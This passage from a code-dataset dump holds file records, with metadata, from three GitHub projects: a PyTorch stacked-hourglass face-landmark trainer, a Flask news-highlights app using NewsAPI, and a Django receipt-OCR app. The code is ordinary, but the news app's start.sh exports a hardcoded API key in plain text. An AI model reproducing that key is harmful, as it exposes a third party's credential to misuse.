num_out, 1), nn.BatchNorm2d(num_out))\n \n def forward(self, x):\n residual = self.conv_block(x)\n if self.skip_layer:\n x = self.skip_layer(x)\n return x + residual"
},
{
"alpha_fraction": 0.5907719135284424,
"alphanum_fraction": 0.619663655757904,
"avg_line_length": 33.62686538696289,
"blob_id": "b9883ee17f78b34291bb36a25646ee723da143ab",
"content_id": "d00a532cc35c2d34a5570dcd8ed48a19d58798d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2319,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 67,
"path": "/utils/utils.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\ndef get_peak_points(heatmaps):\n \"\"\"\n :param heatmaps: numpy array (N, 5, 32, 32)\n :return: numpy array (N, 5, 2)\n \"\"\"\n N,C,H,W = heatmaps.shape\n all_peak_points = []\n for i in range(N):\n peak_points = []\n for j in range(C):\n yy,xx = np.where(heatmaps[i,j] == heatmaps[i,j].max())\n y = yy[0]\n x = xx[0]\n peak_points.append([x,y])\n all_peak_points.append(peak_points)\n all_peak_points = np.array(all_peak_points)\n return all_peak_points\n\ndef merge_and_scale_heatmap(heatmap, scale):\n merged = np.mean(heatmap, axis=0)\n h, w = merged.shape\n scaled = cv2.resize(merged, dsize=(h * scale, w * scale), interpolation=cv2.INTER_LINEAR)\n return scaled\n\ndef plot_heatmap(heatmap, img, mean, scale=4, alpha=0.5):\n '''\n merge heatmaps of different points into one heatmap\n :param heatmap: numpy array (5, 32, 32)\n :param img: image array (3, 128, 128)\n :param mean: mean rgb of dataset\n :param scale: scale factor\n :param alpha: float alpha\n '''\n scaled = merge_and_scale_heatmap(heatmap, scale)\n img_s = np.transpose(np.clip(img + mean, 0, 1), (1, 2, 0))\n fig_withhm = plt.figure()\n plt.imshow(img_s)\n plt.imshow(scaled, cmap='hot', alpha=alpha)\n plt.axis('off')\n return fig_withhm\n\ndef plot_heatmap_compare(heatmaps, heatmap_gt, img, mean, scale=4, alpha=0.5):\n '''\n merge heatmaps of different points into one heatmap\n :param heatmaps: list of numpy array [(5, 32, 32)]\n :param heatmap_gt: numpy array (5, 32, 32) ground truth\n :param img: image array (3, 128, 128)\n :param mean: mean rgb of dataset (3, 1, 1)\n :param scale: scale factor\n :param alpha: float alpha\n '''\n scaled = [merge_and_scale_heatmap(x, scale) for x in heatmaps]\n scaled_gt = merge_and_scale_heatmap(heatmap_gt, scale)\n img_s = np.transpose(np.clip(img + mean, 0, 1), (1, 2, 0))\n img_s = np.concatenate([img_s for _ in range(len(heatmaps) + 1)], axis=1)\n scaled.insert(0, scaled_gt)\n \n scaled_s = np.concatenate(scaled, axis=1)\n fig_withhm = plt.figure(figsize=(2*len(scaled), 2))\n plt.imshow(img_s)\n plt.imshow(scaled_s, cmap='hot', alpha=alpha)\n plt.axis('off')\n return fig_withhm"
},
{
"alpha_fraction": 0.49602964520454407,
"alphanum_fraction": 0.49708840250968933,
"avg_line_length": 39.212764739990234,
"blob_id": "989eaa12ae4078a6faa49077b380981b10d2d13c",
"content_id": "7495ef0d4f1fdc34cc98d5ffdc72f91271338240",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1889,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 47,
"path": "/options/options.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import os, json\n\n\ndef parse_opt(opt_path):\n with open(opt_path, 'r') as f:\n opt = json.load(f)\n # export CUDA_VISIBLE_DEVICES\n if opt['use_gpu']:\n gpu_list = ','.join(str(x) for x in opt['gpu_ids'])\n os.environ['CUDA_VISIBLE_DEVICES'] = gpu_list\n print('===> Export CUDA_VISIBLE_DEVICES = [' + gpu_list + ']')\n else:\n print('===> CPU mode is set (NOTE: GPU is recommended)')\n \n # path\n exp_name = opt['name']\n opt['path']['exp_root'] = os.path.join(opt['path']['root_path'],\n 'experiments', exp_name)\n assert os.path.exists(opt['path']['exp_root']) == opt['resume'] # make sure no conflict\n opt['path']['checkpoint_dir'] = os.path.join(opt['path']['exp_root'],\n 'checkpoint')\n opt['path']['visual_dir'] = os.path.join(opt['path']['exp_root'],\n 'visualization')\n opt['path']['tb_logger_root'] = opt['path']['exp_root'].replace(\n 'experiments', 'tb_logger')\n if not opt['resume']:\n for k, v in opt['path'].items():\n if k == 'root_path':\n continue\n elif k == 'tb_logger_root':\n if opt['use_tb_logger']:\n os.makedirs(v)\n else:\n os.makedirs(v)\n \n # dataset\n for k, v in opt['datasets'].items():\n opt['datasets'][k]['phase'] = k\n opt['datasets'][k]['num_keypoints'] = opt['num_keypoints']\n\n # network\n opt['networks']['hourglass']['num_keypoints'] = opt['num_keypoints']\n opt['networks']['ghcu']['output_dim'] = 2 * opt['num_keypoints']\n opt['networks']['ghcu']['in_channel'] = opt['num_keypoints']\n with open(os.path.join(opt['path']['exp_root'], 'opt.json'), 'w') as f:\n json.dump(opt, f, indent=4)\n return opt"
},
{
"alpha_fraction": 0.7248322367668152,
"alphanum_fraction": 0.7248322367668152,
"avg_line_length": 36.375,
"blob_id": "32a9e6c377a6fb38a9e6ace0d041c9655bd815d5",
"content_id": "f614fca3bb860006f501e29837f8eaf3708f94e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 298,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 8,
"path": "/data/__init__.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "from .dataset import FaceLandmarkDataset\nfrom torch.utils.data import DataLoader\n\ndef create_dataloader(opt):\n ds = FaceLandmarkDataset(opt)\n shuffle = opt['phase'] == 'train'\n dl = DataLoader(ds, batch_size=opt['batch_size'], num_workers=opt['num_workers'], shuffle=shuffle)\n return dl"
},
{
"alpha_fraction": 0.518311083316803,
"alphanum_fraction": 0.5218666791915894,
"avg_line_length": 37.395904541015625,
"blob_id": "ac84ba7668558b19f5ec92f57541c2bf859e0c7b",
"content_id": "d2480bb1f60dffde456dfb65ccca189375580f25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11250,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 293,
"path": "/solver/HourGlassSover.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import argparse, pprint, os\nimport numpy as np\nimport pandas as pd\n\nimport torch\nfrom torch import optim, nn\nfrom torch.utils.data import DataLoader\n\nfrom utils import utils\nfrom model import StackedHourGlass\n\n\nclass HourGlassSover(object):\n def __init__(self, opt):\n super(HourGlassSover, self).__init__()\n self.opt = opt\n self.is_train = opt['is_train']\n self.use_gpu = opt['use_gpu'] and torch.cuda.is_available()\n self.exp_root = opt['path']['exp_root']\n self.checkpoint_dir = opt['path']['checkpoint_dir']\n self.visual_dir = opt['path']['visual_dir']\n self.records = {'epoch': [],\n 'train_loss': [],\n 'val_loss': [],\n 'lr': [],\n 'nme': []\n }\n self.best_epoch = 0\n self.cur_epoch = 1\n self.best_pred = 1.0\n self.model = self._create_model(opt['networks'])\n if self.use_gpu:\n self.model = net = nn.DataParallel(self.model).cuda()\n\n self.print_network()\n if self.is_train:\n self.train_opt = opt['train']\n # set loss\n loss_type = self.train_opt['loss_type']\n if loss_type == 'l1':\n self.criterion = nn.L1Loss()\n elif loss_type == 'l2':\n self.criterion = nn.MSELoss()\n else:\n raise NotImplementedError(\n 'Loss type [%s] is not implemented!' % loss_type)\n if self.use_gpu:\n self.criterion = self.criterion.cuda()\n\n # set optimizer\n weight_decay = self.train_opt['weight_decay'] if self.train_opt[\n 'weight_decay'] else 0\n optim_type = self.train_opt['optimizer'].upper()\n if optim_type == \"ADAM\":\n self.optimizer = optim.Adam(\n self.model.parameters(),\n lr=self.train_opt['learning_rate'],\n weight_decay=weight_decay)\n elif optim_type == \"RMSPROP\":\n self.optimizer = optim.RMSprop(\n self.model.parameters(),\n lr=self.train_opt['learning_rate'],\n weight_decay=weight_decay)\n else:\n raise NotImplementedError(\n 'Loss type [%s] is not implemented!' 
% optim_type)\n\n # set lr_scheduler\n if self.train_opt['lr_scheme'].lower() == 'multisteplr':\n self.scheduler = optim.lr_scheduler.MultiStepLR(\n self.optimizer, self.train_opt['lr_steps'],\n self.train_opt['lr_gamma'])\n else:\n raise NotImplementedError(\n 'Only MultiStepLR scheme is supported!')\n\n self.load()\n \n print('===> Solver Initialized : [%s] || Use GPU : [%s]' %\n (self.__class__.__name__, self.use_gpu))\n\n if self.is_train:\n print(\"optimizer: \", self.optimizer)\n print(\"lr_scheduler milestones: %s gamma: %f\" %\n (self.scheduler.milestones, self.scheduler.gamma))\n\n def feed_data(self, batch):\n self.sample = batch['img']\n self.target = batch['heatmap_gt']\n self.path = batch['path']\n self.landmark_gt = batch['landmark_gt']\n if self.use_gpu:\n self.sample = self.sample.float().cuda()\n self.target = self.target.float().cuda()\n\n def train_step(self):\n self.model.train()\n self.optimizer.zero_grad()\n\n output_list = self.model(self.sample)\n loss = 0.0\n for output in output_list:\n loss += self.criterion(output, self.target)\n loss.backward()\n self.optimizer.step()\n return loss.item()\n\n def evaluate(self):\n self.model.eval()\n with torch.no_grad():\n output_list = self.model(self.sample)\n loss = self.criterion(output_list[-1], self.target)\n landmarks = [utils.get_peak_points(x.cpu().numpy()) * 4 for x in output_list]\n self.landmarks = landmarks\n self.heatmaps = output_list\n return loss.item()\n\n def calc_nme(self):\n '''\n calculate normalized mean error\n '''\n landmark = self.landmarks[-1]\n diff = landmark - self.landmark_gt.numpy()\n nme = np.mean(np.sqrt(np.sum(np.square(diff), axis=2))) / self.sample.shape[-1]\n return nme\n\n def _create_model(self, opt):\n return StackedHourGlass(opt['hourglass'])\n\n def save_checkpoint(self, epoch, is_best):\n \"\"\"\n save checkpoint to experimental dir\n \"\"\"\n filename = os.path.join(self.checkpoint_dir, 'last_ckp.pth')\n print('===> Saving last checkpoint to [%s] ...]' % filename)\n ckp = {\n 'epoch': epoch,\n 'state_dict': self.model.module.state_dict() if isinstance(self.model, nn.DataParallel) else self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'best_pred': self.best_pred,\n 'best_epoch': self.best_epoch,\n 'records': self.records\n }\n torch.save(ckp, filename)\n if is_best:\n print('===> Saving best checkpoint to [%s] ...]' %\n filename.replace('last_ckp', 'best_ckp'))\n torch.save(ckp, filename.replace('last_ckp', 'best_ckp'))\n\n if epoch % self.train_opt['save_interval'] == 0:\n print('===> Saving checkpoint [%d] to [%s] ...]' %\n (epoch,\n filename.replace('last_ckp', 'epoch_%d_ckp' % epoch)))\n\n torch.save(\n ckp, filename.replace('last_ckp', 'epoch_%d_ckp' % epoch))\n\n def load(self):\n \"\"\"\n load or initialize network\n \"\"\"\n if (self.is_train\n and self.opt['train']['pretrain']) or not self.is_train:\n model_path = self.opt['train']['pretrained_path']\n if model_path is None:\n raise ValueError(\n \"[Error] The 'pretrained_path' does not declarate in *.json\"\n )\n\n print('===> Loading model from [%s]...' 
% model_path)\n if self.is_train:\n checkpoint = torch.load(model_path)\n self.model.load_state_dict(checkpoint['state_dict'])\n\n if self.opt['train']['pretrain'] == 'resume':\n self.cur_epoch = checkpoint['epoch'] + 1\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n self.records = checkpoint['records']\n self.best_pred = checkpoint['best_pred']\n self.best_epoch = checkpoint['best_epoch']\n\n else:\n checkpoint = torch.load(model_path)\n if 'state_dict' in checkpoint.keys():\n checkpoint = checkpoint['state_dict']\n load_func = self.model.module.load_state_dict if isinstance(self.model, nn.DataParallel) \\\n else self.model.load_state_dict\n load_func(checkpoint)\n\n # else:\n # self._net_init()\n\n def get_current_learning_rate(self):\n return self.optimizer.param_groups[0]['lr']\n\n def update_learning_rate(self, epoch):\n self.scheduler.step(epoch)\n\n# def get_current_log(self):\n# log = OrderedDict()\n# log['epoch'] = self.cur_epoch\n# log['best_pred'] = self.best_pred\n# log['best_epoch'] = self.best_epoch\n# log['records'] = self.records\n# return log\n\n# def set_current_log(self, log):\n# self.cur_epoch = log['epoch']\n# self.best_pred = log['best_pred']\n# self.best_epoch = log['best_epoch']\n# self.records = log['records']\n\n def save_current_log(self):\n data_frame = pd.DataFrame(\n data={'train_loss': self.records['train_loss']\n , 'val_loss': self.records['val_loss']\n , 'nme': self.records['nme']\n , 'lr': self.records['lr']\n },\n index=range(1, self.cur_epoch + 1)\n )\n data_frame.to_csv(os.path.join(self.exp_root, 'train_records.csv'),\n index_label='epoch')\n \n def print_network(self):\n \"\"\"\n print network summary including module and number of parameters\n \"\"\"\n s, n = self.get_network_description(self.model)\n if isinstance(self.model, nn.DataParallel):\n net_struc_str = '{} - {}'.format(\n self.model.__class__.__name__,\n self.model.module.__class__.__name__)\n else:\n net_struc_str = '{}'.format(self.model.__class__.__name__)\n\n print(\"==================================================\")\n print(\"===> Network Summary\\n\")\n net_lines = []\n line = s + '\\n'\n print(line)\n net_lines.append(line)\n line = 'Network structure: [{}], with parameters: [{:,d}]'.format(\n net_struc_str, n)\n print(line)\n net_lines.append(line)\n\n if self.is_train:\n with open(os.path.join(self.exp_root, 'network_summary.txt'),\n 'w') as f:\n f.writelines(net_lines)\n\n print(\"==================================================\")\n\n def get_current_visual(self):\n res_heatmaps = [\n np.squeeze(x.cpu().numpy(), axis=0) for x in self.heatmaps\n ]\n heatmap_gt = np.squeeze(self.target.cpu().numpy(), axis=0)\n img = np.squeeze(self.sample.cpu().numpy(), axis=0)\n mean = np.reshape(np.array(self.opt['datasets']['train']['mean']), (3, 1, 1))\n fig = utils.plot_heatmap_compare(res_heatmaps, heatmap_gt, img, mean)\n return fig\n \n def log_current_visual(self, img_name, tb_logger, current_step):\n res_heatmaps = [\n np.squeeze(x.cpu().numpy(), axis=0) for x in self.heatmaps\n ]\n heatmap_gt = np.squeeze(self.target.cpu().numpy(), axis=0)\n img = np.squeeze(self.sample.cpu().numpy(), axis=0)\n mean = np.reshape(np.array(self.opt['datasets']['train']['mean']), (3, 1, 1))\n fig = utils.plot_heatmap_compare(res_heatmaps, heatmap_gt, img, mean)\n tb_logger.add_figure(img_name, fig, global_step=current_step)\n\n def save_current_visual(self, img_name, epoch):\n save_dir = os.path.join(self.visual_dir, img_name)\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n 
res_heatmaps = [\n np.squeeze(x.cpu().numpy(), axis=0) for x in self.heatmaps\n ]\n heatmap_gt = np.squeeze(self.target.cpu().numpy(), axis=0)\n img = np.squeeze(self.sample.cpu().numpy(), axis=0)\n mean = np.reshape(np.array(self.opt['datasets']['train']['mean']), (3, 1, 1))\n fig = utils.plot_heatmap_compare(res_heatmaps, heatmap_gt, img, mean)\n fig.savefig(os.path.join(save_dir, '%05d.png' % epoch))\n\n def get_network_description(self, network):\n if isinstance(network, nn.DataParallel):\n network = network.module\n s = str(network)\n n = sum(map(lambda x: x.numel(), network.parameters()))\n return s, n\n"
}
] | 8 |
Isaacg94/news-highlight
|
https://github.com/Isaacg94/news-highlight
|
f99348299f0f1370de416775cdef962ce77064a9
|
69d34504a426bf436fe299215ca71d51fa313b90
|
d35d00cde557886ad267732ed00eef6647cf04f3
|
refs/heads/master
| 2023-05-11T12:56:05.842136 | 2021-03-20T18:31:15 | 2021-03-20T18:31:15 | 214,460,578 | 0 | 4 | null | 2019-10-11T14:44:38 | 2021-03-20T18:31:17 | 2023-05-01T20:14:55 |
Python
|
[
{
"alpha_fraction": 0.6950286626815796,
"alphanum_fraction": 0.6950286626815796,
"avg_line_length": 31.71875,
"blob_id": "b7d6ce7395b0da70b6dbd0ab8875c39c3466628d",
"content_id": "a064c9c1c694815fd2543ef21b7f0bae4bb7e0f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1046,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 32,
"path": "/app/main/views.py",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "from flask import render_template,request,redirect,url_for\nfrom . import main\nfrom ..request import get_sources, get_articles\n\n\n# Views\[email protected]('/')\ndef index():\n\n '''\n View root page function that returns the index page and its data\n '''\n general_categories = get_sources('general')\n # business_category = get_sources('business')\n # entertainment_categories = get_sources('entertainment')\n # sports_categories = get_sources('sports')\n # technology_categories = get_sources('technology')\n # science_category = get_sources('science')\n # health_category = get_sources('health')\n\n title = 'World News Highlights'\n return render_template('index.html',title = title, general = general_categories)\n\[email protected]('/newsarticle/<id>')\ndef newsarticle(id):\n\n '''\n View article page function that returns the article details page and its data\n '''\n articles_items = get_articles(id)\n title = f'{id} | News Articles'\n return render_template('newsarticle.html',title = title,articles = articles_items)"
},
{
"alpha_fraction": 0.5150214433670044,
"alphanum_fraction": 0.7038626670837402,
"avg_line_length": 15.714285850524902,
"blob_id": "8e53a202d00830f46429b0a36d3c68ba74b58ca8",
"content_id": "4f48c7784feebf1376947c3883552112f40779e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 233,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 14,
"path": "/requirements.txt",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "click==6.7\ndominate==2.3.1\nFlask==1.0\nFlask-Bootstrap==3.3.7.1\nFlask-Script==2.0.5\nFlask-WTF==0.14.2\ngunicorn==19.7.1\nitsdangerous==0.24\nJinja2==2.11.3\nMarkupSafe==1.0\nvisitor==0.1.3\nWerkzeug==0.15.3\nWTForms==2.1\npkg-resources==0.0.0"
},
{
"alpha_fraction": 0.5662650465965271,
"alphanum_fraction": 0.8433734774589539,
"avg_line_length": 20,
"blob_id": "e48882212a35cbd883bbc9d48c609d5b75b61f55",
"content_id": "22ea2cbfb35d7a0ad1ac8d1ed0cf85d7ba6ae073",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 83,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 4,
"path": "/start.sh",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "export NEWS_API_KEY='4fa35678b9524ae197e61c351aafa582'\n\n\npython3.6 manage.py server"
},
{
"alpha_fraction": 0.6572797894477844,
"alphanum_fraction": 0.6572797894477844,
"avg_line_length": 29.35454559326172,
"blob_id": "822e3e052ffcc570dca52620ca3a25d91ae88a78",
"content_id": "4516bcc7628f26dc0a39ece331912bd78ece3fd5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3338,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 110,
"path": "/app/request.py",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "import urllib.request,json\nfrom .models import Sources,Articles\n\n\n# Getting api key\napi_key = None\n\n# Getting the movie base url\nbase_url = None\nbase_article_url = None\n\ndef configure_request(app):\n global api_key,base_url,base_article_url\n api_key = app.config['NEWS_API_KEY']\n base_url = app.config['NEWS_API_BASE_URL']\n base_article_url = app.config['ARTICLES_API_BASE_URL']\n\n\ndef get_sources(category):\n '''\n Function that gets the json response to our url request\n '''\n get_sources_url = base_url.format(api_key)\n\n with urllib.request.urlopen(get_sources_url) as url:\n get_sources_data = url.read()\n get_sources_response = json.loads(get_sources_data)\n\n sources_results = None\n\n if get_sources_response['sources']:\n sources_results_list = get_sources_response['sources']\n sources_results = process_sources_results(sources_results_list)\n\n return sources_results\n\ndef process_sources_results(sources_list):\n \"\"\"\n Function that processes the sources result and transform them to a list of Objects\n\n Args:\n sources_list: A list of dictionaries that contain sources details\n\n Returns :\n sources_results: A list of source objects\n \"\"\"\n \n sources_results = []\n for source_item in sources_list:\n id = source_item.get('id')\n name = source_item.get('name')\n description = source_item.get('description')\n url = source_item.get('url')\n category = source_item.get('category')\n language = source_item.get('language')\n country = source_item.get('country')\n\n # if poster:\n source_object = Sources(id, name, description, url, category, language, country)\n sources_results.append(source_object)\n\n return sources_results\n\n\n\ndef get_articles(id):\n '''\n Function that gets the json Articles response to our url request\n '''\n get_articles_url = base_article_url.format(id,api_key)\n\n with urllib.request.urlopen(get_articles_url) as url:\n get_articles_data = url.read()\n get_articles_response = json.loads(get_articles_data)\n\n articles_results = None\n\n if get_articles_response['articles']:\n articles_results_list = get_articles_response['articles']\n articles_results = process_articles_results(articles_results_list)\n\n return articles_results\n\ndef process_articles_results(articles_list):\n \"\"\"\n Function that processes the articles result and transform them to a list of Objects\n\n Args:\n articles_list: A list of dictionaries that contain sources details\n\n Returns :\n articles_results: A list of source objects\n \"\"\"\n \n articles_results = []\n for article_item in articles_list:\n id = article_item.get('id')\n author = article_item.get('author')\n title = article_item.get('title')\n description = article_item.get('description')\n url = article_item.get('url')\n urlToImage = article_item.get('urlToImage')\n publishedAt = article_item.get('publishedAt')\n content = article_item.get('content')\n\n if urlToImage:\n article_object = Articles(id, author, title, description, url, urlToImage, publishedAt, content)\n articles_results.append(article_object)\n\n return articles_results"
},
{
"alpha_fraction": 0.6842989325523376,
"alphanum_fraction": 0.7162048816680908,
"avg_line_length": 58.599998474121094,
"blob_id": "7230e9b5fe53324b9966f787558c215957575b30",
"content_id": "33fe43afc2e7112b8dc81517d85c0b972a8493d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1193,
"license_type": "permissive",
"max_line_length": 786,
"num_lines": 20,
"path": "/tests/test_articles.py",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom app.models import Articles\n\nclass ArticlesTest(unittest.TestCase):\n '''\n Test Class to test the behaviour of the Articles class\n '''\n\n def setUp(self):\n '''\n Set up method that will run before every Test\n '''\n self.new_article = Articles(\"cnn\",\"Toyin Owoseje, CNN\",\"Kim Kardashian defends Meghan and Harry over press treatment\",\"As the UK's Prince Harry takes on the tabloid media over its treatment of his wife, Meghan, Duchess of Sussex, Kim Kardashian has weighed in on the royal couple's side.\",\"https://www.cnn.com/2019/10/14/entertainment/kim-kardashian-meghan-harry-scli-intl/index.html\",\"https://cdn.cnn.com/cnnnext/dam/assets/191014055104-meghan-markle-prince-harry-kim-kardashian-split-super-tease.jpg\",\"2019-10-14T12:57:42Z\",\"(CNN)As the UK's Prince Harry takes on the tabloid media over its treatment of his wife, Meghan, Duchess of Sussex, Kim Kardashian has weighed in on the royal couple's side. The reality TV star, who has long been a target of intense public scrutiny, has come… [+1678 chars]\")\n\n def test_instance(self):\n self.assertTrue(isinstance(self.new_article,Articles))\n\n\nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.6486997604370117,
"alphanum_fraction": 0.6576831936836243,
"avg_line_length": 38.924530029296875,
"blob_id": "169e1d9bdad8b96613a92851f05aec105123f893",
"content_id": "d591d7762e989fdc1b7a7f0a64f65a0288618655",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2115,
"license_type": "permissive",
"max_line_length": 366,
"num_lines": 53,
"path": "/README.MD",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "# GitHub Search\n\n\n\n\n\n### Author\n **[Isaac Gichuru.](https://github.com/Isaacg94)**\n\n## Description\n\nA web application made using Python's Flask that uses the News API to allow a user to keep up with the World News by providing them with daily highlights straight from their preferred sources.\n\n**[Live-Link to site.](https://world-news-highlights.herokuapp.com/)**\n## Features\n* A landing page with a list of some of the most popular news publishers that exists in the world right now.\n* A display of articles from a selected news publisher.\n* A navigation bar with a link to navigate back to the landing page.\n\n## Behaviour Driven Development (BDD)\n|Behaviour \t | Input \t | Output |\n|----------------------------------------------|:-----------------------------------:|-----------------------------:| \n| Page loads, landing page with a list of the various, news sources. | The user , once in the landing page, can click on a news source to get articles from that specific news publisher. | The day's articles from that news publisher as well as an option to read the full article from the publisher's website, are displayed. | |\n\n\n## Setup/Installation Requirements\nHere is a run through of how to set up the application:\n* Step 1 : Clone this repository using the git clone link:\n * **`git clone https://github.com/Isaacg94/news-highlight`**\n* Step 2 : Navigate to the directory:\n * **`cd news-highlight-master`**\n* Step 3 : Open the directory created with your favorite IDE. If Atom type **`atom .`** if VSCode type **`code .`** . This will lauch the editor with the project setup,\n* Now feel free to hack around the project.\n\n## Known Bugs\n* None currently.\n\n\n## Technologies Used\n\n- Python 3.6.8\n- HTML\n- CSS\n- Bootstrap 4.3.1\n\n## Support and contact details\n\nPrimary E-mail Address: [email protected]\n\n### License\n*MIT License* [](license/MIT)\n\nCopyright (c) 2019 **Isaac Gichuru**"
}
] | 6 |
stodola/mlshopping
|
https://github.com/stodola/mlshopping
|
6c3bbb9efb6fd5a0ba88f435a84cb48d502c38a8
|
37f4cd1780cf6985ba98a431843cff62647fb00c
|
b5c832986b1c13bd0195892f0f8f7f793977c475
|
refs/heads/master
| 2021-04-30T16:32:00.075821 | 2017-02-03T22:16:30 | 2017-02-03T22:16:30 | 80,062,903 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8226950168609619,
"alphanum_fraction": 0.8226950168609619,
"avg_line_length": 22.5,
"blob_id": "9f7db1d6348df0c7375ccc767c8a37930028f9a3",
"content_id": "3a49fddcf60b7570033cdc3203c0216bff44e336",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 141,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 6,
"path": "/receipt/admin.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Paragon, ParagonItems\n\n\nadmin.site.register(Paragon)\nadmin.site.register(ParagonItems)\n"
},
{
"alpha_fraction": 0.7444444298744202,
"alphanum_fraction": 0.7444444298744202,
"avg_line_length": 17,
"blob_id": "f8e61e08e632cb5567ef80f3d7544a35994f63b0",
"content_id": "3677c3aaff541debe0d892b027230aeba63863b3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/log_user/apps.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass LogUserConfig(AppConfig):\n name = 'log_user'\n"
},
{
"alpha_fraction": 0.6726457476615906,
"alphanum_fraction": 0.6793721914291382,
"avg_line_length": 22.473684310913086,
"blob_id": "fbc340d4ea1f7a0bd7ea91ea5b9cf7722ca6468f",
"content_id": "eb69579f3787a5378c364727ac19816cac269e44",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 19,
"path": "/log_user/urls.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url,include\nfrom django.contrib import admin\n\nfrom log_user import views\n\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n url(r'^login/$', views.login1,name='login' ),\n url(r'^register/$', views.register1, name='register'),\n url(r'^regsuccess/$', views.register_sussess, name = 'success'),\n url(r'^logout/$', views.logout1, name='logout'),\n\n \n \n ]\n"
},
{
"alpha_fraction": 0.4788602888584137,
"alphanum_fraction": 0.49923408031463623,
"avg_line_length": 26.6610164642334,
"blob_id": "4aa9d8f234b3f257bee4e68c3ed4ff6238e263bf",
"content_id": "2dbed1005f12ca7c03503b2d95b6f8f1502e2be5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6529,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 236,
"path": "/receipt/image_utils.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "import Levenshtein\nimport pytesseract\nfrom PIL import Image\nimport io\n\n\ndef to_text(tekst):\n buf = io.StringIO(tekst)\n tekst=buf.readlines()\n\n poczatek=[] \n koniec=[]\n last_chance = []\n\n\n for i, item in enumerate(tekst):\n\n row = item.replace('\\n','').split(' ') \n for j in row:\n lev=Levenshtein.distance(j, 'FISKALNY')\n poczatek.append((lev,j)) \n\n\n lev2=Levenshtein.distance(j, 'Sprzed.')\n koniec.append((lev2,i,j))\n lev3=Levenshtein.distance(j, 'SP.OP.')\n koniec.append((lev3,i,j))\n lev4=Levenshtein.distance(j, 'Sp.op.')\n koniec.append((lev4,i,j))\n lev5=Levenshtein.distance(j, 'Sprzedaż')\n koniec.append((lev5,i,j))\n lev6_pln=Levenshtein.distance(j, 'PLN')\n last_chance.append((lev6_pln,j))\n # lev7=Levenshtein.distance(j, 'SP.OP.')\n \n\n poczatek1 = min(poczatek)[1]\n\n new_list=[]\n for i, item in enumerate(tekst):\n row = item.replace('\\n','').split(' ')\n for j in row:\n if j == poczatek1:\n new_list = tekst[i+1:]\n break\n# print(new_list)\n new_list2=[]\n \n #ostatnia szansa jak trzeba uzyc PLN\n if min(koniec)[0] >=4 and lev6_pln ==0:\n koniec1 = 'PLN'\n print('if 1')\n for i,item in enumerate(new_list):\n if koniec1 in item:\n new_list2 = new_list[:i]\n break\n#####################################################################################\n elif min(koniec)[0]<4:\n koniec1 = min(koniec)[2]\n for i,item in enumerate(new_list):\n if koniec1 in item:\n new_list2 = new_list[:i]\n break\n else:\n new_list2 = new_list[:]\n\t \n\n\n tekst2= new_list2[:]\n\n\n\n\n #removing first element from list if it is new line or it is equal to 1\n while tekst2[0] == '\\n' or len(tekst2[0])==1:\n 